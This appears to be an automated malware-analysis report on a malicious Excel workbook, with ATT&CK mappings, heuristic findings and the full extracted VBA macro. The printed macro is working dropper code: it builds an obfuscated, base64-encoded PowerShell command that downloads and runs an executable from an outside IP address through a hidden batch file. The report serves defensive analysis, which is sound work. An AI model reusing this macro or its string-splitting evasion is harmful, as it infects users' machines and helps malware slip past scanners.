MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The critical heuristic OLE_VBA_SPLIT_KEYWORD_OBFUSCATION indicates that the VBA macro reassembles the string 'powershell'. The Workbook_Activate subroutine constructs a PowerShell command that downloads and executes a file from the URL 'http://3.64.251.13/v3/2/608552001000.exe'. This PowerShell command is then written to a batch file named 'Ljtlwktfuorsgvwk.bat' and executed. The critical heuristic OLE_VBA_SHELL confirms the use of the Shell() function to execute this batch file.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2275 bytes |
SHA-256: 10f8be18e8ad9dc57f890db991945bbcc4cae7ed8b178157166ed4102fc03a78 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
On Error Resume Next
Dim bat As String
Dim s As String
s = s + "start "
Dim a As String
s = s + "/MI" + "N C:\Wi" + "ndo"
Dim dfdf As String
s = s + "ws\Sys" + "tem32\" + "Wind" + "owsPo" + "wer"
Dim fwefewf As String
s = s + "She" + "ll\v1.0" + "\pow" + "ersh" + "ell." + "exe"
Dim ewfwef As String
s = s + " -win " + "1 -e" + "nc "
s = s + "JABQAHIAbwBjAE4AY"
s = s + "QBtAGUAIAA9ACAAIg"
s = s + "BKAGUAbwB0AHYAcQA"
s = s + "uAGUAeABlACIAOwAo"
s = s + "AE4AZQB3AC0ATwBiA"
s = s + "GoAZQBjAHQAIABTAH"
s = s + "kAcwB0AGUAbQAuAE4"
s = s + "AZQB0AC4AVwBlAGIA"
s = s + "QwBsAGkAZQBuAHQAK"
s = s + "QAuAEQAbwB3AG4AbA"
s = s + "BvAGEAZABGAGkAbAB"
s = s + "lACgAIgBoAHQAdABw"
s = s + "ADoALwAvADMALgA2A"
s = s + "DQALgAyADUAMQAuAD"
s = s + "EAMwA5AC8AdgAzAC8"
s = s + "AMgAvADYAMAA4ADUA"
s = s + "MgAwADAAMAAwADEAM"
s = s + "AAuAGUAeABlACIALA"
s = s + "AiACQAZQBuAHYAOgB"
s = s + "BAFAAUABEAEEAVABB"
s = s + "AFwAJABQAHIAbwBjA"
s = s + "E4AYQBtAGUAIgApAD"
s = s + "sAUwB0AGEAcgB0AC0"
s = s + "AUAByAG8AYwBlAHMA"
s = s + "cwAgACgAIgAkAGUAb"
s = s + "gB2ADoAQQBQAFAARA"
s = s + "BBAFQAQQBcACQAUAB"
s = s + "yAG8AYwBOAGEAbQBl"
s = s + "ACIAKQA="
Dim x As Double
ActiveWorkbook.Save
bat = "Ljtlwktfuorsgvwk.bat"
Open bat For Output As #1
Print #1, s
Close #1
x = Shell(bat, 0)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 6144 bytes |
SHA-256: a7d8db01533918913a8828e92f44d39640d28957abe1a4c4b90c8ab231e9fd07 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.